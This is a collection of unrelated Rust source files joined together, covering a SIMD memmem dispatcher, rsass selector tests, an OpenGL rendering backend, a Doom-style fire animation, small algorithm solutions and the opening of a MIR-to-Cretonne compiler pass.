type MemmemImpl<'a, 'b, 'r, I, R> = avx2_32::Avx2MemmemClassifier32<'a, 'b, 'r, I, R>;
}
else if #[cfg(all(simd = "ssse3_64", target_arch = "x86_64"))] {
type MemmemImpl<'a, 'b, 'r, I, R> = ssse3_64::Ssse3MemmemClassifier64<'a, 'b, 'r, I, R>;
}
else if #[cfg(all(simd = "ssse3_32", any(target_arch = "x86_64", target_arch = "x86")))] {
type MemmemImpl<'a, 'b, 'r, I, R> = ssse3_32::Ssse3MemmemClassifier32<'a, 'b, 'r, I, R>;
}
else {
compile_error!("Target architecture is not supported by SIMD features of this crate. Disable the default `simd` feature.");
}
}
/// Walk through the JSON document represented by `bytes`
/// and classify quoted sequences.
#[must_use]
#[inline(always)]
pub fn memmem<'i, 'b, 'r, I, R>(
input: &'i I,
iter: &'b mut I::BlockIterator<'i, 'r, BLOCK_SIZE, R>,
) -> impl Memmem<'i, 'b, 'r, I, BLOCK_SIZE>
where
I: Input,
R: InputRecorder<I::Block<'i, BLOCK_SIZE>>,
'i: 'r,
{
MemmemImpl::new(input, iter)
}
|
//! Tests auto-converted from "sass-spec/spec/libsass-closed-issues/issue_1441"
#[allow(unused)]
use super::rsass;
// From "sass-spec/spec/libsass-closed-issues/issue_1441/adjacent.hrx"
#[test]
fn adjacent() {
assert_eq!(
rsass(
".adjacent {\
\n & + & {\
\n foo: bar;\
\n }\
\n}\
\n"
)
.unwrap(),
".adjacent + .adjacent {\
\n foo: bar;\
\n}\
\n"
);
}
// From "sass-spec/spec/libsass-closed-issues/issue_1441/child.hrx"
#[test]
fn child() {
assert_eq!(
rsass(
".child {\
\n & > & {\
\n foo: bar;\
\n }\
\n}\
\n"
)
.unwrap(),
".child > .child {\
\n foo: bar;\
\n}\
\n"
);
}
// From "sass-spec/spec/libsass-closed-issues/issue_1441/sibling.hrx"
#[test]
fn sibling() {
assert_eq!(
rsass(
".sibling {\
\n & ~ & {\
\n foo: bar;\
\n }\
\n}\
\n"
)
.unwrap(),
".sibling ~ .sibling {\
\n foo: bar;\
\n}\
\n"
);
}
|
pub use actix::prelude::*;
pub use bytes::{BufMut, BytesMut};
pub use std::net::SocketAddr;
pub use std::sync::Arc;
pub use tokio::io::AsyncReadExt;
pub use tokio::io::AsyncWriteExt;
pub use tokio::io::ReadHalf;
pub use tokio::io::WriteHalf;
pub use tokio::net::{TcpListener, TcpStream};
pub use tokio::sync::broadcast;
|
// Copyright Jeron A. Lau 2018.
// Dual-licensed under either the MIT License or the Boost Software License,
// Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
// https://www.boost.org/LICENSE_1_0.txt)
//! OpenGL implementation for adi_gpu.
extern crate asi_opengl;
extern crate adi_gpu_base;
use std::mem;
pub use base::Shape;
pub use base::Gradient;
pub use base::Model;
pub use base::TexCoords;
pub use base::Texture;
use adi_gpu_base as base;
use asi_opengl::{
OpenGL, OpenGLBuilder, VertexData, Program, Buffer, UniformData,
Feature, Topology,
};
use adi_gpu_base::*;
const SHADER_SOLID_FRAG: &'static [u8] = include_bytes!("shaders/solid-frag.glsl");
const SHADER_SOLID_VERT: &'static [u8] = include_bytes!("shaders/solid-vert.glsl");
const SHADER_GRADIENT_FRAG: &'static [u8] = include_bytes!("shaders/gradient-frag.glsl");
const SHADER_GRADIENT_VERT: &'static [u8] = include_bytes!("shaders/gradient-vert.glsl");
const SHADER_TEX_FRAG: &'static [u8] = include_bytes!("shaders/texture-frag.glsl");
const SHADER_TEX_VERT: &'static [u8] = include_bytes!("shaders/texture-vert.glsl");
const SHADER_FADED_VERT: &'static [u8] = include_bytes!("shaders/faded-vert.glsl");
const SHADER_TINTED_FRAG: &'static [u8] = include_bytes!("shaders/tinted-frag.glsl");
const SHADER_COMPLEX_VERT: &'static [u8] = include_bytes!("shaders/complex-vert.glsl");
const SHADER_COMPLEX_FRAG: &'static [u8] = include_bytes!("shaders/complex-frag.glsl");
const STYLE_GRADIENT: usize = 0;
const STYLE_TEXTURE: usize = 1;
const STYLE_FADED: usize = 2;
const STYLE_TINTED: usize = 3;
const STYLE_SOLID: usize = 4;
const STYLE_COMPLEX: usize = 5;
struct Style {
shader: Program,
matrix_uniform: UniformData,
has_camera: UniformData,
camera_uniform: UniformData,
has_fog: UniformData,
fog: UniformData,
range: UniformData,
alpha: UniformData,
color: UniformData,
position: VertexData,
texpos: VertexData,
acolor: VertexData,
}
impl Style {
// Create a new style.
fn new(context: &OpenGL, vert: &[u8], frag: &[u8]) -> Style {
let shader = Program::new(context, vert, frag);
let matrix_uniform = shader.uniform(b"models_tfm\0");
let has_camera = shader.uniform(b"has_camera\0");
let camera_uniform = shader.uniform(b"matrix\0");
let has_fog = shader.uniform(b"has_fog\0");
let fog = shader.uniform(b"fog\0");
let range = shader.uniform(b"range\0");
let alpha = shader.uniform(b"alpha\0");
let color = shader.uniform(b"color\0");
let position = shader.vertex_data(b"position\0");
let texpos = shader.vertex_data(b"texpos\0");
let acolor = shader.vertex_data(b"acolor\0");
Style {
shader, matrix_uniform, has_camera, camera_uniform, fog,
range, position, texpos, alpha, has_fog, color, acolor,
}
}
}
struct ShapeData {
style: usize,
buffers: [Option<Buffer>; 2],
has_fog: bool,
alpha: Option<f32>,
color: Option<[f32; 4]>,
transform: Transform, // Transformation matrix.
texture: Option<asi_opengl::Texture>,
vertex_buffer: Buffer,
fans: Vec<(u32, u32)>,
}
impl ::adi_gpu_base::Point for ShapeData {
fn point(&self) -> Vec3 {
// Position vector at origin * object transform.
(self.transform.0 * vec4!(0f32, 0f32, 0f32, 1f32)).xyz()
}
}
struct ModelData {
vertex_buffer: Buffer,
// TODO alot could be in base as duplicate
vertex_count: u32,
fans: Vec<(u32, u32)>,
}
struct TexcoordsData {
vertex_buffer: Buffer,
vertex_count: u32,
}
struct GradientData {
vertex_buffer: Buffer,
vertex_count: u32,
}
struct TextureData {
t: asi_opengl::Texture,
}
/// To render anything with adi_gpu, you have to make a `Display`
pub struct Display {
window: adi_gpu_base::Window,
context: OpenGL,
color: (f32, f32, f32),
opaque_ind: Vec<u32>,
alpha_ind: Vec<u32>,
opaque_vec: Vec<ShapeData>,
alpha_vec: Vec<ShapeData>,
gui_vec: Vec<ShapeData>,
models: Vec<ModelData>,
texcoords: Vec<TexcoordsData>,
gradients: Vec<GradientData>,
textures: Vec<TextureData>,
styles: [Style; 6],
xyz: Vec3,
rotate_xyz: Vec3,
ar: f32,
projection: Transform,
}
pub fn new(title: &str, icon: &afi::Video) -> Result<Box<Display>, &'static str>
{
if let Some(tuple) = OpenGLBuilder::new() {
let (builder, v) = tuple;
let window = adi_gpu_base::Window::new(title, icon, Some(v));
let context = builder.to_opengl(match window.get_connection() {
WindowConnection::Xcb(_, window) => // |
// WindowConnection::Windows(_, window) =>
{
unsafe {mem::transmute(window as usize)}
},
WindowConnection::Windows(_, window) => {
window
}
WindowConnection::Wayland => return Err(
"OpenGL support on Wayland is WIP"),
WindowConnection::DirectFB => return Err(
"OpenGL support on DirectFB is WIP"),
WindowConnection::Android => return Err(
"OpenGL support on Android is WIP"),
WindowConnection::IOS => return Err(
"OpenGL support on iOS is WIP"),
WindowConnection::AldaronsOS => return Err(
"AldaronsOS doesn't support OpenGL"),
WindowConnection::Arduino => return Err(
"Arduino doesn't support OpenGL"),
WindowConnection::Switch => return Err(
"Nintendo Switch doesn't support OpenGL"),
WindowConnection::Web => return Err(
"WebGL support is WIP"),
WindowConnection::NoOS => return Err(
"NoOS doesn't support OpenGL"),
});
// Set the settings.
context.disable(Feature::Dither);
context.enable(Feature::CullFace);
context.enable(Feature::Blend);
context.blend();
// Load shaders
let style_solid = Style::new(&context,
SHADER_SOLID_VERT, SHADER_SOLID_FRAG);
let style_gradient = Style::new(&context,
SHADER_GRADIENT_VERT, SHADER_GRADIENT_FRAG);
let style_texture = Style::new(&context,
SHADER_TEX_VERT, SHADER_TEX_FRAG);
let style_faded = Style::new(&context,
SHADER_FADED_VERT, SHADER_TEX_FRAG);
let style_tinted = Style::new(&context,
SHADER_TEX_VERT, SHADER_TINTED_FRAG);
let style_complex = Style::new(&context,
SHADER_COMPLEX_VERT, SHADER_COMPLEX_FRAG);
let wh = window.wh();
let ar = wh.0 as f32 / wh.1 as f32;
let projection = base::projection(ar, 0.5 * PI);
// Adjust the viewport
context.viewport(wh.0, wh.1);
let mut display = ::Display {
window,
context,
color: (0.0, 0.0, 0.0),
alpha_ind: vec![],
opaque_ind: vec![],
alpha_vec: vec![],
opaque_vec: vec![],
gui_vec: vec![],
models: vec![],
texcoords: vec![],
gradients: vec![],
textures: vec![],
styles: [
style_gradient,
style_texture,
style_faded,
style_tinted,
style_solid,
style_complex,
],
xyz: vec3!(0.0, 0.0, 0.0),
rotate_xyz: vec3!(0.0, 0.0, 0.0),
ar,
projection,
};
use base::Display;
display.camera(vec3!(0.0, 0.0, 0.0), vec3!(0.0, 0.0, 0.0));
Ok(Box::new(display))
} else {
Err("Couldn't find OpenGL!")
}
}
impl base::Display for Display {
fn color(&mut self, color: (f32, f32, f32)) {
self.color = color;
self.context.color(color.0, color.1, color.2);
}
fn update(&mut self) -> Option<adi_gpu_base::Input> {
if let Some(input) = self.window.update() {
return Some(input);
}
// Update Window:
// TODO: This is copied pretty much from adi_gpu_vulkan. Move
// to the base.
// Opaque & Alpha Shapes need a camera.
for i in (&self.styles).iter() {
i.has_camera.set_int1(1);
}
// Enable for 3D depth testing
self.context.enable(Feature::DepthTest);
// sort nearest
::adi_gpu_base::zsort(&mut self.opaque_ind, &self.opaque_vec,
true, self.xyz);
for shape in self.opaque_vec.iter() {
draw_shape(&self.styles[shape.style], shape);
}
// sort farthest
::adi_gpu_base::zsort(&mut self.alpha_ind, &self.alpha_vec,
false, self.xyz);
for shape in self.alpha_vec.iter() {
draw_shape(&self.styles[shape.style], shape);
}
// Disable Depth Testing for GUI
self.context.disable(Feature::DepthTest);
// Gui Elements don't want a camera.
for i in (&self.styles).iter() {
i.has_camera.set_int1(0);
}
// No need to sort gui elements.
for shape in self.gui_vec.iter() {
draw_shape(&self.styles[shape.style], shape);
}
// end todo
self.context.update();
// Return None, there was no input, updated screen.
None
}
fn camera(&mut self, xyz: Vec3, rotate_xyz: Vec3) {
// Set Camera
self.xyz = xyz;
self.rotate_xyz = rotate_xyz;
// Write To Camera Uniforms. TODO: only before use (not here).
// TODO this assignment copied from vulkan implementation. Put
// in the base library.
let cam = Transform::IDENTITY
.t(vec3!()-self.xyz) // Move camera - TODO: negation operator?
.r(vec3!()-self.rotate_xyz) // Rotate camera - TODO: negation operator?
.m(self.projection.0); // Apply projection to camera
for i in (&self.styles).iter() {
i.camera_uniform.set_mat4(cam.into());
}
}
fn model(&mut self, vertices: &[f32], fans: Vec<(u32, u32)>) -> Model {
// TODO most is duplicate from other implementation.
let index = self.models.len();
let buffer = Buffer::new(&self.context);
let vertex_buffer = buffer;
vertex_buffer.set(vertices);
self.models.push(ModelData {
vertex_buffer, vertex_count: vertices.len() as u32 / 4,
fans
});
Model(index)
}
fn fog(&mut self, fog: Option<(f32, f32)>) -> () {
let fogc = [self.color.0, self.color.1, self.color.2, 1.0];
let fogr = if let Some(fog) = fog {
[fog.0, fog.1]
} else {
[::std::f32::MAX, 0.0]
};
for i in (&self.styles).iter() {
i.fog.set_vec4(&fogc);
i.range.set_vec2(&fogr);
}
}
fn texture(&mut self, wh: (u16,u16), graphic: &VFrame) -> Texture {
let (w, h) = wh;
let pixels = graphic.0.as_slice();
let t = self.context.texture();
t.set(w, h, pixels);
let a = self.textures.len();
self.textures.push(TextureData { t });
Texture(a, w, h)
}
fn gradient(&mut self, colors: &[f32]) -> Gradient {
// TODO: A lot of duplication here from adi_gpu_vulkan. Put in
// base.
let vertex_buffer = Buffer::new(&self.context);
vertex_buffer.set(colors);
let a = self.gradients.len();
self.gradients.push(GradientData {
vertex_buffer,
vertex_count: colors.len() as u32 / 4,
});
Gradient(a)
}
fn texcoords(&mut self, texcoords: &[f32]) -> TexCoords {
// TODO: A lot of duplication here from adi_gpu_vulkan. Put in
// base.
let vertex_buffer = Buffer::new(&self.context);
vertex_buffer.set(texcoords);
let a = self.texcoords.len();
self.texcoords.push(TexcoordsData {
vertex_buffer,
vertex_count: texcoords.len() as u32 / 4,
});
TexCoords(a)
}
fn set_texture(&mut self, texture: &mut Texture, wh: (u16,u16),
graphic: &VFrame)
{
self.textures[texture.0].t.set(wh.0, wh.1,
graphic.0.as_slice());
}
#[inline(always)]
fn shape_solid(&mut self, model: &Model, transform: Transform,
color: [f32; 4], blending: bool, fog: bool, camera: bool)
-> Shape
{
let shape = ShapeData {
style: STYLE_SOLID,
buffers: [None, None],
has_fog: fog,
alpha: None,
color: Some(color),
texture: None,
vertex_buffer: self.models[model.0].vertex_buffer.clone(),
transform, // Transformation matrix.
fans: self.models[model.0].fans.clone(),
};
base::new_shape(if !camera && !fog {
let index = self.gui_vec.len() as u32;
self.gui_vec.push(shape);
base::ShapeHandle::Gui(index)
} else if blending {
let index = self.alpha_vec.len() as u32;
self.alpha_vec.push(shape);
self.alpha_ind.push(index);
base::ShapeHandle::Alpha(index)
} else {
let index = self.opaque_vec.len() as u32;
self.opaque_vec.push(shape);
self.opaque_ind.push(index);
base::ShapeHandle::Opaque(index)
})
}
#[inline(always)]
fn shape_gradient(&mut self, model: &Model, transform: Transform,
colors: Gradient, blending: bool, fog: bool, camera: bool)
-> Shape
{
// TODO: is copied from adi_gpu_vulkan, move to base
if self.models[model.0].vertex_count
!= self.gradients[colors.0].vertex_count
{
panic!("TexCoord length doesn't match gradient length");
}
let shape = ShapeData {
style: STYLE_GRADIENT,
buffers: [
Some(self.gradients[colors.0].vertex_buffer.clone()),
None
],
has_fog: fog,
alpha: None,
color: None,
texture: None,
vertex_buffer: self.models[model.0].vertex_buffer.clone(),
transform, // Transformation matrix.
fans: self.models[model.0].fans.clone(),
};
base::new_shape(if !camera && !fog {
let index = self.gui_vec.len() as u32;
self.gui_vec.push(shape);
base::ShapeHandle::Gui(index)
} else if blending {
let index = self.alpha_vec.len() as u32;
self.alpha_vec.push(shape);
self.alpha_ind.push(index);
base::ShapeHandle::Alpha(index)
} else {
let index = self.opaque_vec.len() as u32;
self.opaque_vec.push(shape);
self.opaque_ind.push(index);
base::ShapeHandle::Opaque(index)
})
}
#[inline(always)]
fn shape_texture(&mut self, model: &Model, transform: Transform,
texture: &Texture, tc: TexCoords, blending: bool, fog: bool,
camera: bool) -> Shape
{
// TODO: from adi_gpu_vulkan, move to the base
if self.models[model.0].vertex_count
!= self.texcoords[tc.0].vertex_count
{
panic!("TexCoord length doesn't match vertex length");
}
let shape = ShapeData {
style: STYLE_TEXTURE,
buffers: [
Some(self.texcoords[tc.0].vertex_buffer.clone()),
None
],
has_fog: fog,
alpha: None,
color: None,
texture: Some(self.textures[texture.0].t.clone()),
vertex_buffer: self.models[model.0].vertex_buffer.clone(),
transform, // Transformation matrix.
fans: self.models[model.0].fans.clone(),
};
base::new_shape(if !camera && !fog {
let index = self.gui_vec.len() as u32;
self.gui_vec.push(shape);
base::ShapeHandle::Gui(index)
} else if blending {
let index = self.alpha_vec.len() as u32;
self.alpha_vec.push(shape);
self.alpha_ind.push(index);
base::ShapeHandle::Alpha(index)
} else {
let index = self.opaque_vec.len() as u32;
self.opaque_vec.push(shape);
self.opaque_ind.push(index);
base::ShapeHandle::Opaque(index)
})
}
#[inline(always)]
fn shape_faded(&mut self, model: &Model, transform: Transform,
texture: &Texture, tc: TexCoords, alpha: f32, fog: bool,
camera: bool) -> Shape
{
// TODO: from adi_gpu_vulkan, move to the base
if self.models[model.0].vertex_count
!= self.texcoords[tc.0].vertex_count
{
panic!("TexCoord length doesn't match vertex length");
}
let shape = ShapeData {
style: STYLE_FADED,
buffers: [
Some(self.texcoords[tc.0].vertex_buffer.clone()),
None
],
has_fog: fog,
alpha: Some(alpha),
color: None,
texture: Some(self.textures[texture.0].t.clone()),
vertex_buffer: self.models[model.0].vertex_buffer.clone(),
transform, // Transformation matrix.
fans: self.models[model.0].fans.clone(),
};
base::new_shape(if !camera && !fog {
let index = self.gui_vec.len() as u32;
self.gui_vec.push(shape);
base::ShapeHandle::Gui(index)
} else {
let index = self.alpha_vec.len() as u32;
self.alpha_vec.push(shape);
self.alpha_ind.push(index);
base::ShapeHandle::Alpha(index)
})
}
#[inline(always)]
fn shape_tinted(&mut self, model: &Model, transform: Transform,
texture: &Texture, tc: TexCoords, tint: [f32; 4], blending: bool,
fog: bool, camera: bool) -> Shape
{
// TODO: from adi_gpu_vulkan, move to the base
if self.models[model.0].vertex_count
!= self.texcoords[tc.0].vertex_count
{
panic!("TexCoord length doesn't match vertex length");
}
let shape = ShapeData {
style: STYLE_TINTED,
buffers: [
Some(self.texcoords[tc.0].vertex_buffer.clone()),
None,
],
has_fog: fog,
alpha: None,
color: Some(tint),
texture: Some(self.textures[texture.0].t.clone()),
vertex_buffer: self.models[model.0].vertex_buffer.clone(),
transform, // Transformation matrix.
fans: self.models[model.0].fans.clone(),
};
base::new_shape(if !camera && !fog {
let index = self.gui_vec.len() as u32;
self.gui_vec.push(shape);
base::ShapeHandle::Gui(index)
} else if blending {
let index = self.alpha_vec.len() as u32;
self.alpha_vec.push(shape);
self.alpha_ind.push(index);
base::ShapeHandle::Alpha(index)
} else {
let index = self.opaque_vec.len() as u32;
self.opaque_vec.push(shape);
self.opaque_ind.push(index);
base::ShapeHandle::Opaque(index)
})
}
#[inline(always)]
fn shape_complex(&mut self, model: &Model, transform: Transform,
texture: &Texture, tc: TexCoords, tints: Gradient,
blending: bool, fog: bool, camera: bool) -> Shape
{
// TODO: from adi_gpu_vulkan, move to the base
if self.models[model.0].vertex_count
!= self.texcoords[tc.0].vertex_count
{
panic!("TexCoord length doesn't match vertex length");
}
// TODO: is copied from adi_gpu_vulkan, move to base
if self.models[model.0].vertex_count
!= self.gradients[tints.0].vertex_count
{
panic!("TexCoord length doesn't match gradient length");
}
let shape = ShapeData {
style: STYLE_COMPLEX,
buffers: [
Some(self.texcoords[tc.0].vertex_buffer.clone()),
Some(self.gradients[tints.0].vertex_buffer.clone()),
],
has_fog: fog,
alpha: None,
color: None,
texture: Some(self.textures[texture.0].t.clone()),
vertex_buffer: self.models[model.0].vertex_buffer.clone(),
transform, // Transformation matrix.
fans: self.models[model.0].fans.clone(),
};
base::new_shape(if !camera && !fog {
let index = self.gui_vec.len() as u32;
self.gui_vec.push(shape);
base::ShapeHandle::Gui(index)
} else if blending {
let index = self.alpha_vec.len() as u32;
self.alpha_vec.push(shape);
self.alpha_ind.push(index);
base::ShapeHandle::Alpha(index)
} else {
let index = self.opaque_vec.len() as u32;
self.opaque_vec.push(shape);
self.opaque_ind.push(index);
base::ShapeHandle::Opaque(index)
})
}
#[inline(always)]
fn drop_shape(&mut self, shape: &Shape) {
match get_shape(&shape) {
ShapeHandle::Opaque(x) => {
let index = self.opaque_ind.iter()
.position(|y| *y == x).unwrap();
self.opaque_ind.remove(index);
},
ShapeHandle::Alpha(x) => {
let index = self.alpha_ind.iter()
.position(|y| *y == x).unwrap();
self.alpha_ind.remove(index);
},
ShapeHandle::Gui(x) => {
// TODO: make it obvious that there's only meant
// to be 1 GUI object.
self.gui_vec.clear();
},
}
}
fn transform(&mut self, shape: &Shape, transform: Transform) {
// TODO: put in base, some is copy from vulkan implementation.
match base::get_shape(shape) {
ShapeHandle::Opaque(x) => {
let x = x as usize; // for indexing
self.opaque_vec[x].transform = transform;
},
ShapeHandle::Alpha(x) => {
let x = x as usize; // for indexing
self.alpha_vec[x].transform = transform;
},
ShapeHandle::Gui(x) => {
let x = x as usize; // for indexing
self.gui_vec[x].transform = transform;
},
}
}
fn resize(&mut self, wh: (u16, u16)) -> () {
let xyz = self.xyz;
let rotate_xyz = self.rotate_xyz;
self.ar = wh.0 as f32 / wh.1 as f32;
self.context.viewport(wh.0, wh.1);
self.projection = ::base::projection(self.ar, 0.5 * PI);
self.camera(xyz, rotate_xyz);
}
fn wh(&self) -> (u16, u16) {
self.window.wh()
}
}
fn draw_shape(style: &Style, shape: &ShapeData) {
style.matrix_uniform.set_mat4(shape.transform.into());
if !style.texpos.is_none() {
// Set texpos for the program from the texpos buffer.
style.texpos.set(shape.buffers[0].as_ref().unwrap());
// Bind the texture
shape.texture.as_ref().unwrap().bind();
}
if !style.acolor.is_none() {
// Set colors for the program from the color buffer.
// TODO: probably shouldn't be same buffer as texpos.
style.acolor.set(shape.buffers[0].as_ref().unwrap());
}
if !style.alpha.is_none() {
style.alpha.set_vec1(shape.alpha.unwrap());
}
if !style.color.is_none() {
style.color.set_vec4(&shape.color.unwrap());
}
if shape.has_fog {
style.has_fog.set_int1(1);
} else {
style.has_fog.set_int1(0);
}
// Set vertices for the program from the vertex buffer.
style.position.set(&shape.vertex_buffer);
for i in shape.fans.iter() {
style.shader.draw_arrays(Topology::TriangleFan, i.0..i.1);
}
}
|
use minifb::{Key, Scale, Window, WindowOptions};
use rand::{thread_rng, Rng};
const ROWS: usize = 90;
const COLS: usize = 160;
const COLORS: [u32; 36] = [
0x0007_0707,
0x001f_0707,
0x002f_0f07,
0x0047_0f07,
0x0057_1707,
0x0067_1f07,
0x0077_1f07,
0x008f_2707,
0x009f_2f07,
0x00af_3f07,
0x00bf_4707,
0x00c7_4707,
0x00df_4f07,
0x00df_5707,
0x00df_5707,
0x00d7_5f07,
0x00d7_670f,
0x00cf_6f0f,
0x00cf_770f,
0x00cf_7f0f,
0x00cf_8717,
0x00c7_8717,
0x00c7_8f17,
0x00c7_971f,
0x00bf_9f1f,
0x00bf_9f1f,
0x00bf_a727,
0x00bf_a727,
0x00bf_af2f,
0x00b7_af2f,
0x00b7_b72f,
0x00b7_b737,
0x00cf_cf6f,
0x00df_df9f,
0x00ef_efc7,
0x00ff_ffff,
];
#[derive(Clone, Copy)]
struct FirePixel {
index: usize,
}
impl FirePixel {
fn new() -> FirePixel {
FirePixel { index: 0 }
}
}
type FireGrid = [[FirePixel; COLS]; ROWS];
struct State {
fire_grid: FireGrid,
}
impl State {
/// Initialize a new state with a fire grid where all `FirePixel`s are black (index == 0), except for the first row,
/// where all `FirePixels` are at full heat (index = MAX_COLOR).
fn new() -> State {
let mut fire_grid = [[FirePixel::new(); COLS]; ROWS];
fire_grid[0] = [FirePixel {
index: COLORS.len() - 1,
}; COLS];
State { fire_grid }
}
fn update(&mut self) {
for y in 1..ROWS {
for x in 0..COLS {
spread_fire(y, x, &mut self.fire_grid)
}
}
}
fn draw(&self, buffer: &mut [u32]) {
for (y, row) in self.fire_grid.iter().enumerate() {
for (x, fire_pixel) in row.iter().enumerate() {
let color = COLORS[fire_pixel.index];
let y = ROWS - y - 1;
buffer[x + y * COLS] = color;
}
}
}
}
fn spread_fire(target_y: usize, target_x: usize, fire_grid: &mut FireGrid) {
let mut rng = thread_rng();
// heat source
let src_index = {
/* heat can go sideways, so we accept the following ranges:
- y: [-1, 0]
- x: [-1, +1] (must check boundaries)
*/
let source_x = {
let modifier = rng.gen_range(-1, 2);
let cols = COLS as isize;
((target_x as isize + modifier + cols) % cols) as usize
// or use mod_euc, which hasn't been stabilized yet
};
let source_y = target_y - rng.gen_range(0, 2);
let source_fire_pixel = &fire_grid[source_y][source_x];
source_fire_pixel.index
};
// fire pixel visited by this iteration
let mut target_fire_pixel = &mut fire_grid[target_y][target_x];
let decay = rng.gen_range(0, 2);
target_fire_pixel.index = src_index.saturating_sub(decay);
}
pub fn main() -> minifb::Result<()> {
let mut state = State::new();
let mut buffer = [0; ROWS * COLS];
let mut window = Window::new(
"doom-fire",
COLS,
ROWS,
WindowOptions {
scale: Scale::X4,
..WindowOptions::default()
},
)?;
while window.is_open() && !window.is_key_down(Key::Escape) {
state.update();
state.draw(&mut buffer);
window.update_with_buffer(&buffer)?;
}
Ok(())
}
|
use proconio::{fastout, input};
#[fastout]
fn main() {
input! {
n: usize,
d: i64,
x_y: [(i64, i64); n],
};
let d2 = d.pow(2);
let mut ans = 0;
for (x, y) in x_y.iter() {
if x.pow(2) + y.pow(2) - d2 <= 0 {
ans += 1;
}
}
println!("{}", ans);
}
|
pub fn get_money_amount(n: i32) -> i32 {
use std::cmp::*;
let n = n as usize;
let mut dp = vec![vec![0; n + 1]; n + 1];
for offset in 1..=n {
for a in 1..=n - offset {
let b = a + offset;
dp[a][b] = (a..b).map(|k| max(dp[a][k - 1], dp[k + 1][b]) + k).fold(1 << 30, |acc, x| min(acc, x))
}
}
dp[1][n] as i32
} |
extern crate cretonne;
extern crate cton_frontend;
use error::*;
use rustc::mir::{Mir, Local};
use rustc::mir::{UnOp, BinOp, Literal, Lvalue, Operand, ProjectionElem, Rvalue, AggregateKind,
CastKind, StatementKind, TerminatorKind};
use rustc::dep_graph::DepNode;
use rustc::middle::const_val::ConstVal;
use rustc_const_math::{ConstInt, ConstIsize};
use rustc::ty::{self, TyCtxt, Ty, FnSig};
use rustc::ty::layout::{self, Layout, Size};
use rustc::ty::subst::Substs;
use rustc::hir::intravisit::{self, Visitor, FnKind, NestedVisitorMap};
use rustc::hir::{FnDecl, BodyId};
use rustc::hir::def_id::DefId;
use rustc::traits::Reveal;
use syntax::ast::{NodeId, IntTy, UintTy, FloatTy};
use syntax::codemap::Span;
use std::ptr;
use std::collections::HashMap;
use std::cell::RefCell;
use monomorphize;
use traits;
use rustc_data_structures::indexed_vec::Idx;
use self::cretonne::ir::condcodes::IntCC;
use self::cretonne::ir::InstBuilder;
use std::u32;
#[derive(Debug, Clone)]
pub struct Mir2CretonneTransOptions {
pub optimize: bool,
pub print: bool,
pub binary_output_path: Option<String>,
}
impl Mir2CretonneTransOptions {
pub fn new() -> Mir2CretonneTransOptions {
Mir2CretonneTransOptions {
optimize: false,
print: true,
binary_output_path: None,
}
}
}
fn visit_krate<'g, 'tcx>(
tcx: TyCtxt<'g, 'tcx, 'tcx>,
entry_fn: Option<NodeId>,
) -> Vec<cretonne::ir::Function> {
let mut context: CretonneModuleCtxt = CretonneModuleCtxt::new(tcx, entry_fn);
tcx.hir.krate().visit_all_item_likes(
&mut context.as_deep_visitor(),
);
context.functions
}
pub fn trans_crate<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
entry_fn: Option<NodeId>,
options: &Mir2CretonneTransOptions,
) -> Result<()> {
let _ignore = tcx.dep_graph.in_ignore();
let functions = visit_krate(tcx, entry_fn);
// TODO: Run the Cretonne verifier.
// TODO: Run Cretonne optimization passes.
if options.print {
panic!("Unimplemented: print the functions");
}
// TODO: Emit output.
Ok(())
}
struct CretonneModuleCtxt<'b, 'gcx: 'b + 'tcx, 'tcx: 'b> {
tcx: TyCtxt<'b, 'gcx, 'tcx>,
entry_fn: Option<NodeId>,
fun_types: HashMap<ty::FnSig<'gcx>, cretonne::ir::SigRef>,
fun_names: HashMap<(DefId, ty::FnSig<'gcx>), String>,
functions: Vec<cretonne::ir::Function>,
}
impl<'c, 'gcx: 'c + 'tcx, 'tcx: 'c> CretonneModuleCtxt<'c, 'gcx, 'tcx> {
fn new(
tcx: TyCtxt<'c, 'gcx, 'tcx>,
entry_fn: Option<NodeId>,
) -> CretonneModuleCtxt<'c, 'gcx, 'tcx> {
CretonneModuleCtxt {
tcx: tcx,
entry_fn: entry_fn,
fun_types: HashMap::new(),
fun_names: HashMap::new(),
functions: Vec::new(),
}
}
}
impl<'e, 'tcx: 'e, 'h> Visitor<'h> for CretonneModuleCtxt<'e, 'tcx, 'tcx> {
fn nested_visit_map<'this>(&'this mut self) -> NestedVisitorMap<'this, 'h> {
NestedVisitorMap::None
}
fn visit_fn(&mut self, fk: FnKind<'h>, fd: &'h FnDecl, b: BodyId, s: Span, id: NodeId) {
let did = self.tcx.hir.local_def_id(id);
let generics = self.tcx.generics_of(did);
// don't translate generic functions yet
if generics.types.len() + generics.parent_types as usize > 0 {
return;
}
let mir = self.tcx.optimized_mir(did);
let sig = self.tcx.fn_sig(did);
let sig = sig.skip_binder();
let mut func = cretonne::ir::Function::new();
let mut il_builder = cton_frontend::ILBuilder::new();
let mut func_builder = cton_frontend::FunctionBuilder::new(&mut func, &mut il_builder);
{
let mut ctxt = CretonneFnCtxt {
tcx: self.tcx,
mir: mir,
did: did,
sig: sig,
builder: &mut func_builder,
entry_fn: self.entry_fn,
fun_types: &mut self.fun_types,
fun_names: &mut self.fun_names,
checked_op_local: None,
var_map: Vec::new(),
temp_map: Vec::new(),
ret_var: None,
};
ctxt.trans();
}
intravisit::walk_fn(self, fk, fd, b, s, id)
}
}
// An opaque reference to local variable in Rust.
#[derive(Copy, Clone, PartialEq, Eq, Hash, Debug)]
struct Variable(u32);
impl cretonne::entity_ref::EntityRef for Variable {
fn new(index: usize) -> Self {
assert!(index < (u32::MAX as usize));
Variable(index as u32)
}
fn index(self) -> usize {
self.0 as usize
}
}
impl Default for Variable {
fn default() -> Variable {
Variable(u32::MAX)
}
}
struct CretonneFnCtxt<'f: 'g, 'g, 'd, 'gcx: 'd + 'tcx, 'tcx: 'd> {
tcx: TyCtxt<'d, 'gcx, 'tcx>,
mir: &'d Mir<'tcx>,
did: DefId,
sig: &'d FnSig<'gcx>,
builder: &'g mut cton_frontend::FunctionBuilder<'f, Variable>,
entry_fn: Option<NodeId>,
fun_types: &'d mut HashMap<ty::FnSig<'gcx>, cretonne::ir::SigRef>,
fun_names: &'d mut HashMap<(DefId, ty::FnSig<'gcx>), String>,
checked_op_local: Option<u32>,
var_map: Vec<Option<usize>>,
temp_map: Vec<Option<usize>>,
ret_var: Option<usize>,
}
impl<'f: 'g, 'g, 'd, 'gcx: 'd + 'tcx, 'tcx: 'd> CretonneFnCtxt<'f, 'g, 'd, 'gcx, 'tcx> {
fn num_args(&self) -> usize {
self.sig.inputs().len()
}
